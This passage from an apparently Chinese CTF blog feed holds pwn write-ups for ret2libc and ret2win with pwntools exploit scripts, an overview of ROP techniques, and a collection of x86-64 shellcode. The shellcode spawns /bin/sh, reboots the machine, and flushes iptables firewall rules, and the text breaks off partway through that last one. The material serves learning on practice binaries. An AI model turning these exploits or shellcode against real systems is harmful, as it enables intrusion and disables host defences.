class="line">ret2libc3 = ELF(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">gdb.attach(sh, <span class="string">"break main"</span>)</span><br><span class="line"></span><br><span class="line">puts_got = ret2libc3.got[<span class="string">'puts'</span>]</span><br><span class="line">puts_plt = ret2libc3.plt[<span class="string">'puts'</span>]</span><br><span class="line">main = ret2libc3.symbols[<span class="string">'_start'</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"leak puts_got addr and return to main again"</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">112</span>, puts_plt, main, puts_got])</span><br><span class="line">sh.sendlineafter(<span class="string">b'Can you find it !?'</span>, payload)</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"ready leak libc..."</span>)</span><br><span class="line">puts_addr = u32(sh.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"puts_addr: "</span>+ <span class="built_in">hex</span>(puts_addr))</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">'_IO_puts'</span>, puts_addr)</span><br><span class="line">libcbase = puts_addr - libc.dump(<span class="string">'_IO_puts'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"libcbase: "</span>, <span class="built_in">hex</span>(libcbase))</span><br><span class="line"></span><br><span class="line">system_addr = libcbase + libc.dump(<span class="string">'system'</span>) <span class="comment">#0x04fa50</span></span><br><span class="line">binsh_addr = libcbase + libc.dump(<span class="string">'str_bin_sh'</span>) <span class="comment"># 0x1abf05</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"system: "</span>+ <span class="built_in">hex</span>(system_addr)+<span class="string">"\n"</span>+<span class="string">"binsh:"</span> + <span class="built_in">hex</span>(binsh_addr))</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"get shell"</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">112</span>, system_addr, <span class="number">0xdeadbeef</span>, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2libc/image-20220916221028464.png" alt="image-20220916221028464"></p><blockquote><p>参考:</p><p><a href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#1">ROP</a></p><p><a href="https://blog.csdn.net/weixin_43363675/article/details/118056125">Stackoverflow Lab006: ret2libc3</a></p></blockquote>]]></content>
<summary type="html"><blockquote>
<p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">题目地址</a> ret2libc</p>
</blockquote>
<h1 i</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2libc" scheme="https://www.rgzzplus.com/tags/ret2libc/"/>
</entry>
<entry>
<title>ret2win</title>
<link href="https://www.rgzzplus.com/2022/09/18/ret2win/"/>
<id>https://www.rgzzplus.com/2022/09/18/ret2win/</id>
<published>2022-09-18T02:24:30.000Z</published>
<updated>2022-09-18T02:30:15.432Z</updated>
<content type="html"><![CDATA[<blockquote><p>题目地址:<a href="https://ropemporium.com/challenge/ret2win.html">ret2win</a></p></blockquote><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><p>拿到题目后,首先检查一下文件类型,看看保护机制。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2win$ file ret2win</span><br><span class="line">ret2win: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=19abc0b3bb228157af55b8e16af7316d54ab0597, not stripped</span><br><span class="line">sakura@Kylin:~/下载/ret2win$ checksec ret2win</span><br><span class="line">[*] '/home/sakura/下载/ret2win/ret2win'</span><br><span class="line"> Arch: amd64-64-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x400000)</span><br></pre></td></tr></table></figure><p>它是一个 64 位的程序,可以看到只开启了 NX。要想绕过它,就要运用 ROP 技术了。</p><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><p>再把它拖进 IDA 看看。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> setvbuf(_bss_start, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ret2win by ROP Emporium"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"x86_64\n"</span>);</span><br><span class="line"> pwnme();</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"\nExiting"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"><span class="type">int</span> <span class="title function_">pwnme</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> s[<span class="number">32</span>]; <span class="comment">// [rsp+0h] [rbp-20h] BYREF</span></span><br><span class="line"></span><br><span class="line"> <span class="built_in">memset</span>(s, <span class="number">0</span>, <span class="keyword">sizeof</span>(s));</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"What could possibly go wrong?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You there, may I have your input please? And don't worry about null bytes, we're using read()!\n"</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"> "</span>);</span><br><span class="line"> read(<span class="number">0</span>, s, <span class="number">0x38</span>uLL);</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"Thank you!"</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>这里我们发现了一个 ret2win() 函数</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">ret2win</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Well done! Here's your flag:"</span>);</span><br><span class="line"> <span class="keyword">return</span> system(<span class="string">"/bin/cat flag.txt"</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2win/image-20220912214133774.png" alt="image-20220912214133774"></p><p>这里能打印出 flag.txt ,所以我们就通过将返回地址覆盖为 0x400756,来调用这个函数。</p><p>先来看看,需要填充多少字符才能覆盖到返回地址。</p><p>老规矩启用 peda,<code>pattern create 200</code> ,调试到 <code>ret</code> 指令,此时栈的情况如下:<br><img src="/2022/09/18/ret2win/image-20220912215027379.png" alt="image-20220912215027379"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pattern offset AA0AAFAAbAA1AAGA</span><br><span class="line">AA0AAFAAbAA1AAGA found at offset: 40</span><br></pre></td></tr></table></figure><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2><p>构建脚本 <a href="http://ret2win.py">ret2win.py</a></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./ret2win"</span>)</span><br><span class="line">gdb.attach(p, <span class="string">"break main"</span>)</span><br><span class="line">bin_addr = <span class="number">0x400756</span></span><br><span class="line">payload = <span class="string">b'a'</span>*<span class="number">40</span> + p64(bin_addr)</span><br><span class="line">p.recvuntil(<span class="string">b"> "</span>)</span><br><span class="line"><span class="built_in">input</span>(<span class="string">"already..."</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="built_in">input</span>(<span class="string">"send payload after..."</span>)</span><br><span class="line">p.recvuntil(<span class="string">b"Here's your flag: "</span>)</span><br><span class="line">p.interactive()</span><br><span class="line">success(flag)</span><br></pre></td></tr></table></figure><p>我在本地测试时,碰到了下面这个问题,查资料 <a href="https://www.freesion.com/article/3772838918/">本地测试碰到的问题及其解决方法</a> 说是栈操作导致无法对齐 0x10 的原因。</p><p><img src="/2022/09/18/ret2win/image-20220912232441944.png" alt="image-20220912232441944"></p><p>将 <a href="http://ret2win.py">ret2win.py</a> 的 bin_addr = 0x40075a 跳过栈操作,即可。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = 'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./ret2win"</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p, "break main")</span></span><br><span class="line">bin_addr = <span class="number">0x40075a</span></span><br><span class="line">payload = <span class="string">b'a'</span>*<span class="number">40</span> + p64(bin_addr)</span><br><span class="line">p.recvuntil(<span class="string">b"> "</span>)</span><br><span class="line"><span class="comment">#input("already")</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="comment">#input("send payload after")</span></span><br><span class="line">p.recvuntil(<span class="string">b"Here's your flag:\n"</span>)</span><br><span class="line">flag=p.recvline()</span><br><span class="line"><span class="comment">#p.interactive()</span></span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure><p>结果:</p><p><img src="/2022/09/18/ret2win/image-20220912233639670.png" alt="image-20220912233639670"></p>]]></content>
<summary type="html"><blockquote>
<p>题目地址:<a href="https://ropemporium.com/challenge/ret2win.html">ret2win</a></p>
</blockquote>
<h2 id="0x1"><a class="markdownI</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2win" scheme="https://www.rgzzplus.com/tags/ret2win/"/>
</entry>
<entry>
<title>基本ROP</title>
<link href="https://www.rgzzplus.com/2022/09/18/%E5%9F%BA%E6%9C%ACROP/"/>
<id>https://www.rgzzplus.com/2022/09/18/%E5%9F%BA%E6%9C%ACROP/</id>
<published>2022-09-18T02:24:07.000Z</published>
<updated>2022-09-19T07:53:55.820Z</updated>
<content type="html"><![CDATA[<h1 id="基本-rop"><a class="markdownIt-Anchor" href="#基本-rop"></a> 基本 ROP</h1><h2 id="rop-简介"><a class="markdownIt-Anchor" href="#rop-简介"></a> ROP 简介</h2><p>最开始,只需将函数返回地址覆盖为 jmp esp 指令的地址,然后在后面添加 shellcode 就可以执行。后来引入了 NX 机制,数据所在内存页被标记为不可执行,此时再执行 shellcode 就会抛出异常。既然注入的代码不行,那就复用程序中已有的代码。</p><p>有以下一些概念:</p><p>/1. rop:<strong>返回导向编程(Return Oriented Programming),在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。</strong></p><p>/2. gadgets:在程序中的指令片段,有时我们为了达到我们执行命令的目的,需要多个gadget来完成我们的功能。gadget最后一般都有ret,因为我们需要将程序控制权(EIP)给下一个gadget。即让程序自动持续的选择堆栈中的指令依次执行。</p><p>/3. ropgadgets:一个pwntools的一个命令行工具,用来具体寻找gadgets的。例如:我们从pop、ret序列当中寻找其中的eax<br><code>ROPgadget --binary ./7.exe --only "pop|ret" | grep "eax"</code></p><p>/4. 在linux系统中,函数的调用是有一个系统调用号的。例如execve("/bin/sh",null,null)函数其系统调用号是59,即十六进制0x3b。</p><p>之所以称之为 ROP,是因为核心在于利用了指令集中的 ret 指令,改变了指令流的执行顺序。ROP 攻击一般得满足如下条件</p><ul><li>程序存在溢出,并且可以控制返回地址。</li><li>可以找到满足条件的 gadgets 以及相应 gadgets 的地址。</li></ul><p>如果 gadgets 每次的地址是不固定的,那我们就需要想办法动态获取对应的地址了。</p><h2 id="寻找-gadgets"><a class="markdownIt-Anchor" href="#寻找-gadgets"></a> 寻找 gadgets</h2><p>/1. 在程序中寻找所有的 c3(ret) 字节</p><p>/2. 向前搜索,看前面的字节是否包含一个有效指令,这里可以指定最大搜索字节数,以获得不同长度的 gadgets</p><p>/3. 记录下我们找到的所有有效指令序列</p><p>理论上我们是可以这样寻找 gadgets 的,但实际上有很多工具可以完成这个工作,如 ROPgadget,Ropper 等。更完整的搜索可以使用 <a href="http://ropshell.com/%E3%80%82">http://ropshell.com/。</a></p><h3 id="常用的-gadgets"><a class="markdownIt-Anchor" href="#常用的-gadgets"></a> 常用的 gadgets</h3><p>对于 gadgets 能做的事情,基本上只要你敢想,它就敢执行。下面简单介绍几种用法:</p><ul><li>保存栈数据到寄存器<ul><li>将栈顶的数据抛出并保存到寄存器中,然后跳转到新的栈顶地址。所以当返回地址被一个 gadgets 的地址覆盖,程序将在返回后执行该指令序列。</li><li>如:<code>pop eax; ret</code></li></ul></li><li>保存内存数据到寄存器<ul><li>将内存地址处的数据加载到内存器中。</li><li>如:<code>mov ecx,[eax]; ret</code></li></ul></li><li>保存寄存器数据到内存<ul><li>将寄存器的值保存到内存地址处。</li><li>如:<code>mov [eax],ecx; ret</code></li></ul></li><li>算数和逻辑运算<ul><li>add, sub, mul, xor 等。</li><li>如:<code>add eax,ebx; ret</code>, <code>xor edx,edx; ret</code></li></ul></li><li>系统调用<ul><li>执行内核中断</li><li>如:<code>int 0x80; ret</code>, <code>call gs:[0x10]; ret</code></li></ul></li><li>会影响栈帧的 gadgets<ul><li>这些 gadgets 会改变 ebp 的值,从而影响栈帧,在一些操作如 stack pivot 时我们需要这样的指令来转移栈帧。</li><li>如:<code>leave; ret</code>, <code>pop ebp; ret</code></li></ul></li></ul><h2 id="ret2text"><a class="markdownIt-Anchor" href="#ret2text"></a> ret2text</h2><h3 id="原理"><a class="markdownIt-Anchor" href="#原理"></a> 原理</h3><p>ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。</p><p>这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。</p><h3 id="例子"><a class="markdownIt-Anchor" href="#例子"></a> 例子</h3><p><a href="https://www.rgzzplus.com/2022/09/05/ret2text/">ret2text@rgzzplus</a></p><h2 id="ret2shellcode"><a class="markdownIt-Anchor" href="#ret2shellcode"></a> ret2shellcode</h2><h3 id="原理-2"><a class="markdownIt-Anchor" href="#原理-2"></a> 原理</h3><p>ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。<strong>一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码</strong>。</p><p>在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。</p><h3 id="例子-2"><a class="markdownIt-Anchor" href="#例子-2"></a> 例子</h3><p><a href="https://www.rgzzplus.com/2022/09/05/ret2shellcode/">ret2shellcode@rgzzplus</a></p><h2 id="ret2syscall"><a class="markdownIt-Anchor" href="#ret2syscall"></a> ret2syscall</h2><h3 id="原理-3"><a class="markdownIt-Anchor" href="#原理-3"></a> 原理</h3><p>ret2syscall,即控制程序执行系统调用,获取 shell。</p><h3 id="例子-3"><a class="markdownIt-Anchor" href="#例子-3"></a> 例子</h3><p><a href="https://www.rgzzplus.com/2022/09/18/ret2syscall/">ret2syscall@rgzzplus</a></p><h2 id="ret2libc"><a class="markdownIt-Anchor" href="#ret2libc"></a> ret2libc</h2><h3 id="原理-4"><a class="markdownIt-Anchor" href="#原理-4"></a> 原理</h3><p>ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。</p><h3 id="例子-4"><a class="markdownIt-Anchor" href="#例子-4"></a> 例子</h3><p><a href="https://www.rgzzplus.com/2022/09/18/ret2libc/">ret2libc@rgzzplus</a></p><h2 id="其它例子"><a class="markdownIt-Anchor" href="#其它例子"></a> 其它例子</h2><p><a href="https://www.rgzzplus.com/2022/09/18/ret2win/">ret2win@rgzzplus</a></p>]]></content>
<summary type="html"><h1 id="基本-rop"><a class="markdownIt-Anchor" href="#基本-rop"></a> 基本 ROP</h1>
<h2 id="rop-简介"><a class="markdownIt-Anchor" href="#rop-简介"></a</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ROP" scheme="https://www.rgzzplus.com/tags/ROP/"/>
</entry>
<entry>
<title>shellcode_linux_x86_64</title>
<link href="https://www.rgzzplus.com/2022/09/06/shellcode-linux-x86-64/"/>
<id>https://www.rgzzplus.com/2022/09/06/shellcode-linux-x86-64/</id>
<published>2022-09-06T08:21:17.000Z</published>
<updated>2022-09-06T08:21:38.822Z</updated>
<content type="html"><![CDATA[<p>[TOC]</p><blockquote><p>本文是我的另一篇文章的精简版,删除了参考文章,以及一些额外的解释,只保留了最关键的部分。如想学习写shellcode,可以去阅读 <a href="https://www.rgzzplus.com/2022/08/08/Linux-shellcode%E5%BC%80%E5%8F%91%E4%B9%8B%E5%AE%9E%E6%88%98/">Linux_shellcode开发之实战</a></p></blockquote><h1 id="0-readme"><a class="markdownIt-Anchor" href="#0-readme"></a> 0. README</h1><p>下列文章中的汇编代码,用下面的命令编译运行:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$ </span><span class="language-bash">nasm -f elf64 fileName.asm</span> </span><br><span class="line"><span class="meta">$ </span><span class="language-bash">ld -m elf_x86_64 fileName.o -o fileName</span> </span><br><span class="line"><span class="meta">$ </span><span class="language-bash">./fileName</span> </span><br></pre></td></tr></table></figure><blockquote><p>注意:这里和下面的 fileName,都要用实际相应的文件名替换。</p></blockquote><p>用下面这串命令,来自动提取机器码:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for i in $(objdump -d fileName.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo </span><br></pre></td></tr></table></figure><blockquote><p>注意:提取出的机器码放在 c语言代码的 shellcode[] 这个常量数组中。</p></blockquote><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//fileName.c</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><string.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">const</span> <span class="type">char</span> shellcode[] = <span class="string">"/*将机器码放在这里*/"</span>;</span><br><span class="line"> <span class="comment">//当shellcode包含空字符时,printf 将会打印出错误的 shellcode 长度</span></span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Shellcode length: %d bytes\n"</span>,<span class="built_in">strlen</span>(shellcode));</span><br><span class="line"> (*(<span class="type">void</span>(*)())shellcode)();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>搭建好的 c语言代码,用下面的命令编译运行:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$ </span><span class="language-bash">gcc fileName.c -o fileName -z execstack -z norelro -no-pie -g</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash">./execve_sh64</span></span><br></pre></td></tr></table></figure><p>以下,只提供汇编代码,相应参数我会在代码头做相应注释。</p><h1 id="1-打开-terminal"><a class="markdownIt-Anchor" href="#1-打开-terminal"></a> 1. 打开 terminal</h1><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">; execveSh64_30.asm</span><br><span class="line">; length = 30 bytes</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"> </span><br><span class="line">_start:</span><br><span class="line">; execve("/bin/sh", ["/bin/sh"], NULL)</span><br><span class="line">; rax = 0x3b, rdx= NULL, rdi = '//bin/sh', rsi = '//bin/sh'</span><br><span class="line">xorrdx, rdx</span><br><span class="line">movqword rbx, '//bin/sh'; 0x68732f6e69622f2f</span><br><span class="line">shrrbx, 0x8</span><br><span class="line">pushrbx</span><br><span class="line">movrdi, rsp</span><br><span class="line">pushrax</span><br><span class="line">pushrdi</span><br><span class="line">movrsi, rsp</span><br><span class="line">moval, 0x3b</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">; execveSh64_28.asm</span><br><span class="line">; length = 28 bytes</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">xor rcx, rcx</span><br><span class="line">mul rcx</span><br><span class="line"></span><br><span class="line">add al, 0x3b ; execve()</span><br><span class="line">mov rbx, 0x68732f2f6e69622f ; hs//nib/</span><br><span class="line"></span><br><span class="line">; Argument one shell[0] = "/bin//sh"</span><br><span class="line">push rdx ; null</span><br><span class="line">push rbx ; hs//nib/</span><br><span class="line"></span><br><span class="line">; We need pointers for execve()</span><br><span class="line">push rsp ; *pointer to shell[0]</span><br><span class="line">pop rdi ; Argument 1</span><br><span class="line"></span><br><span class="line">; Argument two shell (including address of each argument in array)</span><br><span class="line">push rdx ; null</span><br><span class="line">push rdi ; address of shell[0]</span><br><span class="line"></span><br><span class="line">; We need pointers for execve()</span><br><span class="line">push rsp ; address of char * shell</span><br><span class="line">pop rsi ; Argument 2</span><br><span class="line"></span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">;execveSh64_27.asm</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">xor eax, eax</span><br><span class="line">mov rbx, 0xFF978CD091969DD1</span><br><span class="line">neg rbx</span><br><span class="line">push rbx</span><br><span class="line">;mov rdi, rsp</span><br><span class="line">push rsp</span><br><span class="line">pop rdi</span><br><span class="line">cdq</span><br><span class="line">push rdx</span><br><span class="line">push rdi</span><br><span class="line">;mov rsi, rsp</span><br><span class="line">push rsp</span><br><span class="line">pop rsi</span><br><span class="line">mov al, 0x3b</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><blockquote><p><a href="https://blog.csdn.net/zmrz1/article/details/53349631">关于汇编语言中cdq指令作用解惑</a></p><p>cdq的作用无非就是将一个32位有符合数扩展为64位有符合数,数据能表示的数不变,具体是这样实现的,比如eax=fffffffb(值为-5),然后cdq把eax的最高位bit,也就是二进制1,全部复制到edx的每一个bit位,EDX 变成 FFFFFFFF,这时eax与edx连起来就是一个64位数,FFFFFFFF FFFFFFFB ,它是一个 64 bit 的大型数字,数值依旧是 -5</p></blockquote><h1 id="2-重启-reboot"><a class="markdownIt-Anchor" href="#2-重启-reboot"></a> 2. 重启 reboot</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">; execveReboot.asm</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"> </span><br><span class="line">_start:</span><br><span class="line">; execve("/usr/sbin/reboot", ["/usr/sbin/reboot"], NULL)</span><br><span class="line">; rax = 0x3b, rdx= NULL, rdi = '/usr/sbin/reboot', rsi = '/usr/sbin/reboot'</span><br><span class="line">xorrdx, rdx</span><br><span class="line">push rdx</span><br><span class="line">movrbx, 'n/reboot'</span><br><span class="line">pushrbx</span><br><span class="line">mov rbx, '/usr/sbi'</span><br><span class="line">push rbx</span><br><span class="line">movrdi, rsp</span><br><span class="line">pushrax</span><br><span class="line">pushrdi</span><br><span class="line">movrsi, rsp</span><br><span class="line">moval, 0x3b</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><h1 id="3-关闭防火墙清空-iptable"><a class="markdownIt-Anchor" href="#3-关闭防火墙清空-iptable"></a> 3. 关闭防火墙(清空 iptable)</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">; clearIptable.asm</span><br><span class="line">; 注:需要root权限</span><br><span class="line">section .text</span><br><span class="line">global _start</span><br><span class="line"> </span><br><span class="line">_start:</span><br><span class="line"> xor rax, rax</span><br><span class="line"> push rax</span><br><span class="line"> push word 0x462d</span><br><span class="line"> mov rcx, rsp</span><br><span class="line"> </span><br><span class="line"> mov rbx, 0x73656c626174ffff</span><br><span class="line"> shr rbx, 0x10</span><br><span class="line"> push rbx</span><br><span class="line"> mov rbx, 0x70692f6e6962732f</span><br><span class="line"> push rbx</span><br><span class="line"> mov rdi, rsp</span><br><span class="line"> </span><br><span class="line"> push rax</span><br><span class="line"> push 